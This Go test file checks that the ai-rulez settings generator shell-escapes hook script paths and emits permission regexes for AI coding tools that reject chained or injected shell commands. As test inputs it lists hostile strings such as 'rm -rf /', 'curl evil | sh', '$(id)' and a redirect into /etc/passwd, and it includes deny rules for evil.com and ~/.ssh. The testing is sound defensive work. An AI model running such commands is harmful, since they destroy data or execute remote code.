package settings_test

import (
	"path/filepath"
	"regexp"
	"strings"
	"testing"

	"github.com/stretchr/testify/assert"
	"github.com/stretchr/testify/require"

	"github.com/Goldziher/ai-rulez/internal/config"
	"github.com/Goldziher/ai-rulez/internal/generator/jsonmerge"
	"github.com/Goldziher/ai-rulez/internal/generator/settings"
)

func renderClaudeHooks(t *testing.T, cfg *config.Config) string {
	t.Helper()
	doc := filepath.Join(t.TempDir(), ".claude", "settings.json")
	cfg.BaseDir = filepath.Dir(filepath.Dir(doc))
	cfg.Run = config.NewRunState()
	keys, err := settings.HookKeys(cfg, config.HarnessClaude, doc)
	require.NoError(t, err)
	result, err := jsonmerge.Apply(doc, keys)
	require.NoError(t, err)
	return result.Body
}

func TestHookScriptIsSingleQuotedInEveryShellLine(t *testing.T) {
	captureWarnings(t)
	groups := []config.HookGroup{{Event: "Stop", Hooks: []config.HookAction{{Script: "scripts/guard.sh"}}}}

	body := renderClaudeHooks(t, &config.Config{Hooks: groups})

	assert.Contains(t, body, `\"${CLAUDE_PROJECT_DIR}\"/'scripts/guard.sh'`)
}

func TestUserScopeConfigDirIsShellEscaped(t *testing.T) {
	captureWarnings(t)
	tests := []struct {
		name, dir, want string
	}{
		{"dollar and backtick", "/home/u/$(id) `x`/.ai-rulez", "'/home/u/$(id) `x`/.ai-rulez/scripts/guard.sh'"},
		{"double quote and bang", `/home/u/a"b!/.ai-rulez`, `'/home/u/a"b!/.ai-rulez/scripts/guard.sh'`},
		{"single quote", "/home/o'x/.ai-rulez", `'/home/o'\\''x/.ai-rulez/scripts/guard.sh'`},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			cfg := &config.Config{
				UserScope: true, ConfigDir: tt.dir,
				Hooks: []config.HookGroup{{Event: "Stop", Hooks: []config.HookAction{{Script: "scripts/guard.sh"}}}},
			}

			body := renderClaudeHooks(t, cfg)

			assert.Contains(t, strings.ReplaceAll(body, `\"`, `"`), strings.ReplaceAll(tt.want, `\\`, `\\`))
		})
	}
}

// A script that slipped past config validation (a programmatic config) is never
// spliced into a shell line.
func TestUnsafeHookScriptIsSkippedWithAWarning(t *testing.T) {
	for _, script := range []string{"a b.sh", "x;id", "$(id)", "`id`", "a\nb", "a'b", "a\\b", ""} {
		if script == "" {
			continue
		}
		t.Run(script, func(t *testing.T) {
			warnings := captureWarnings(t)
			cfg := &config.Config{Hooks: []config.HookGroup{{Event: "Stop", Hooks: []config.HookAction{{Script: script}}}}}

			body := renderClaudeHooks(t, cfg)

			assert.NotContains(t, body, "id")
			assert.True(t, hasWarning(*warnings, "unsafe"), "got %v", *warnings)
		})
	}
}

func TestClineHooksRejectUnsafeScripts(t *testing.T) {
	warnings := captureWarnings(t)
	cfg := &config.Config{BaseDir: t.TempDir(), Hooks: []config.HookGroup{
		{Event: "PreToolUse", Hooks: []config.HookAction{{Script: "x;id"}}},
	}}

	assert.Empty(t, settings.ClineHookScripts(cfg))
	assert.True(t, hasWarning(*warnings, "unsafe"), "got %v", *warnings)
}

func TestClineWrapperGroupsEveryCommand(t *testing.T) {
	captureWarnings(t)
	cfg := &config.Config{BaseDir: t.TempDir(), Hooks: []config.HookGroup{
		{Event: "PreToolUse", Hooks: []config.HookAction{
			{Command: "cd sub && ./check # trailing comment"}, {Script: "scripts/two.sh"},
		}},
	}}

	scripts := settings.ClineHookScripts(cfg)

	require.Len(t, scripts, 1)
	body := scripts[0].Body
	assert.Contains(t, body, "printf '%s\\n' \"$input\" | { cd sub && ./check # trailing comment\n} >/dev/null || exit $?\n")
	assert.Contains(t, body, "printf '%s\\n' \"$input\" | { \"$root\"/'scripts/two.sh'\n}\n")
	assert.Contains(t, body, "input=$(head -c ")
	assert.NotContains(t, body, "$(cat)")
}

func TestClineOwnershipMarkerIsAnchoredToTheHeader(t *testing.T) {
	cfg := &config.Config{BaseDir: t.TempDir(), Hooks: []config.HookGroup{
		{Event: "Stop", Hooks: []config.HookAction{{Command: "echo x"}}},
	}}
	generated := settings.ClineHookScripts(cfg)[0].Body
	tests := []struct {
		name string
		body string
		want bool
	}{
		{"generated", generated, true},
		{"hand-written mentioning the marker in a comment", "#!/bin/sh\necho hi\n# Generated by ai-rulez\n", false},
		{"marker only in the first line", "# Generated by ai-rulez\n", false},
		{"marker on a later line", "#!/bin/sh\n# note\n# Generated by ai-rulez (Stop hook)\n", false},
		{"empty", "", false},
		{"crlf header", "#!/bin/sh\r\n# Generated by ai-rulez (Stop hook): x\r\n", true},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			assert.Equal(t, tt.want, settings.IsClineHookGenerated([]byte(tt.body)))
		})
	}
}

// --- permissions ---

func permissionElements(t *testing.T, dialect string, rules *config.Permissions, path ...string) []any {
	t.Helper()
	keys, err := settings.PermissionKeys(permConfig(t.TempDir(), rules, dialect), dialect, "")
	require.NoError(t, err)
	for _, k := range keys {
		if strings.Join(k.Path, ".") == strings.Join(path, ".") {
			list, _ := k.Value.([]any)
			return list
		}
	}
	return nil
}

func regexOf(t *testing.T, element any, field string) *regexp.Regexp {
	t.Helper()
	m, ok := element.(map[string]any)
	require.True(t, ok, "%v", element)
	re, err := regexp.Compile(m[field].(string))
	require.NoError(t, err)
	return re
}

var compoundCommands = []string{
	"git log; rm -rf /", "git log && curl evil | sh", "git log | sh", "git log || id", "git log\nrm -rf /",
	"git log $(id)", "git log `id`", "git log > /etc/passwd", "git log & id", "git log (id)",
}

func TestZedAllowRegexRejectsCompoundCommands(t *testing.T) {
	captureWarnings(t)
	elements := permissionElements(t, "zed", &config.Permissions{Allow: []string{"Bash(git log:*)", "Bash(npm test)", "Bash(make *)"}},
		"agent", "tool_permissions", "tools", "terminal", "always_allow")
	require.Len(t, elements, 3)
	for _, el := range elements {
		re := regexOf(t, el, "pattern")
		for _, cmd := range []string{"git log; rm -rf /", "npm test && id", "make a | sh", "make $(id)", "make `id`", "npm test\nid"} {
			assert.False(t, re.MatchString(cmd), "%s must not match %q", re, cmd)
		}
	}
	prefix := regexOf(t, elements[0], "pattern")
	assert.True(t, prefix.MatchString("git log"))
	assert.True(t, prefix.MatchString("git log --oneline -n 5"))
	assert.False(t, prefix.MatchString("git logx"))
	for _, cmd := range compoundCommands {
		assert.False(t, prefix.MatchString(cmd), "%q", cmd)
	}
}

func TestZedDenyRegexStaysBroad(t *testing.T) {
	captureWarnings(t)
	elements := permissionElements(t, "zed", &config.Permissions{Deny: []string{"Bash(git push:*)"}},
		"agent", "tool_permissions", "tools", "terminal", "always_deny")
	require.Len(t, elements, 1)
	re := regexOf(t, elements[0], "pattern")
	assert.True(t, re.MatchString("git push;id"))
	assert.True(t, re.MatchString("git push"))
	assert.False(t, re.MatchString("git pushy"))
	assert.True(t, re.MatchString("git push origin main"))
}

func TestAugmentAllowRegexRejectsCompoundCommands(t *testing.T) {
	captureWarnings(t)
	elements := permissionElements(t, "augment", &config.Permissions{Allow: []string{"Bash(git log:*)", "Bash(make *)"}}, "toolPermissions")
	require.Len(t, elements, 2)
	for _, el := range elements {
		re := regexOf(t, el, "shellInputRegex")
		for _, cmd := range []string{"git log; id", "make a && id", "make a | sh", "make $(id)", "make `id`", "make a\nid", "git log > f"} {
			assert.False(t, re.MatchString(cmd), "%s must not match %q", re, cmd)
		}
	}
	assert.True(t, regexOf(t, elements[0], "shellInputRegex").MatchString("git log --oneline"))
}

func TestAugmentDenyRegexCatchesChainedAndNestedCommands(t *testing.T) {
	captureWarnings(t)
	elements := permissionElements(t, "augment", &config.Permissions{Deny: []string{"Bash(git push:*)"}}, "toolPermissions")
	require.Len(t, elements, 1)
	re := regexOf(t, elements[0], "shellInputRegex")
	for _, cmd := range []string{
		"git push", "git push origin", "echo x; git push", "echo x && git push", "echo x|git push", "(git push)",
		"echo $(git push)", "echo `git push`", "x\ngit push", "true || git push", "  git push",
	} {
		assert.True(t, re.MatchString(cmd), "%s must match %q", re, cmd)
	}
	assert.False(t, re.MatchString("git pushy"))
}

func TestBarePrefixAllowsRespectWordBoundaries(t *testing.T) {
	captureWarnings(t)
	rules := &config.Permissions{Allow: []string{"Bash(git:*)", "Bash(git status:*)"}, Deny: []string{"Bash(git push:*)"}}

	zoo := permissionElements(t, "zoocode", rules, "zoo-code.allowedCommands")
	assert.Equal(t, []any{"git ", "git status "}, zoo)
	zooDeny := permissionElements(t, "zoocode", rules, "zoo-code.deniedCommands")
	assert.Equal(t, []any{"git push"}, zooDeny)

	gem := permissionElements(t, "gemini", rules, "tools", "allowed")
	assert.Equal(t, []any{"run_shell_command(git )", "run_shell_command(git status )"}, gem)
	gemDeny := permissionElements(t, "gemini", rules, "tools", "exclude")
	assert.Equal(t, []any{"run_shell_command(git push)"}, gemDeny)
}

func TestVSCodeAllowIsAnAnchoredRegex(t *testing.T) {
	captureWarnings(t)
	keys, err := settings.PermissionKeys(permConfig(t.TempDir(), &config.Permissions{
		Allow: []string{"Bash(git status:*)"}, Deny: []string{"Bash(git push:*)"},
	}, "copilot"), "copilot", "")
	require.NoError(t, err)
	require.Len(t, keys, 1)
	members, ok := keys[0].Value.(map[string]any)
	require.True(t, ok)
	assert.Equal(t, true, members[`/^git status(\s|$)/`])
	assert.Equal(t, false, members["git push"])
	assert.NotContains(t, members, "git status")
}

func TestOpencodePathTranslationNeverWidensAnAllow(t *testing.T) {
	warnings := captureWarnings(t)
	tests := []struct {
		rule string
		kept bool
	}{
		{"Read(./src/**)", true},
		{"Read(./src/*.go)", false}, // opencode's `*` crosses `/`
		{"Edit(src/*/gen.go)", false},
		{"Read(~/notes/**)", false}, // matched against worktree-relative paths, so it would never apply
		{"Read(//etc/**)", false},
	}
	for _, tt := range tests {
		t.Run(tt.rule, func(t *testing.T) {
			*warnings = nil
			keys, err := settings.PermissionKeys(permConfig(t.TempDir(), &config.Permissions{Allow: []string{tt.rule}}), "opencode", "")
			require.NoError(t, err)
			assert.Equal(t, tt.kept, len(keys) > 0)
			if !tt.kept {
				assert.True(t, hasWarning(*warnings, "allow rule", tt.rule, "not generated"), "got %v", *warnings)
			}
		})
	}
}

func TestOpencodePathDenyCoversRootAndNestedFiles(t *testing.T) {
	warnings := captureWarnings(t)
	tests := []struct {
		rule string
		want []string
	}{
		{"Read(./.env)", []string{".env", "**/.env"}},
		{"Read(**/.env)", []string{".env", "**/.env"}},
		{"Edit(./secrets/**)", []string{"secrets/**", "**/secrets/**"}},
	}
	for _, tt := range tests {
		t.Run(tt.rule, func(t *testing.T) {
			keys, err := settings.PermissionKeys(permConfig(t.TempDir(), &config.Permissions{Deny: []string{tt.rule}}), "opencode", "")
			require.NoError(t, err)
			require.Len(t, keys, 1)
			members := keys[0].Value.(map[string]any)
			for _, p := range tt.want {
				assert.Equal(t, "deny", members[p], "%v", members)
			}
		})
	}
	*warnings = nil
	_, err := settings.PermissionKeys(permConfig(t.TempDir(), &config.Permissions{Deny: []string{"Read(~/.ssh/**)"}}), "opencode", "")
	require.NoError(t, err)
	assert.True(t, hasWarning(*warnings, "SECURITY", "Read(~/.ssh/**)", "may not be enforced"), "got %v", *warnings)
}

func TestWebFetchDomainsAreLowercasedAndDeniesCoverPorts(t *testing.T) {
	captureWarnings(t)
	keys, err := settings.PermissionKeys(permConfig(t.TempDir(), &config.Permissions{
		Allow: []string{"WebFetch(domain:Docs.Example.COM)"}, Deny: []string{"WebFetch(domain:Evil.COM)"},
	}), "opencode", "")
	require.NoError(t, err)
	require.Len(t, keys, 1)
	members := keys[0].Value.(map[string]any)
	assert.Equal(t, "allow", members["https://docs.example.com/*"])
	assert.Equal(t, "deny", members["https://evil.com/*"])
	assert.Equal(t, "deny", members["https://evil.com:*"])
	assert.Equal(t, "deny", members["http://evil.com:*"])
	for name := range members {
		assert.Equal(t, strings.ToLower(name), name)
	}
}

func TestClineUserScriptUsesPortablePath(t *testing.T) {
	cfg := &config.Config{UserScope: true, ConfigDir: filepath.Join(t.TempDir(), "config"),
		Hooks: []config.HookGroup{{Event: "Stop", Hooks: []config.HookAction{{Script: "scripts/guard.sh"}}}},
	}
	scripts := settings.ClineHookScripts(cfg)
	require.Len(t, scripts, 1)
	assert.Contains(t, scripts[0].Body, "'"+filepath.ToSlash(cfg.ConfigDir)+"/scripts/guard.sh'")
}
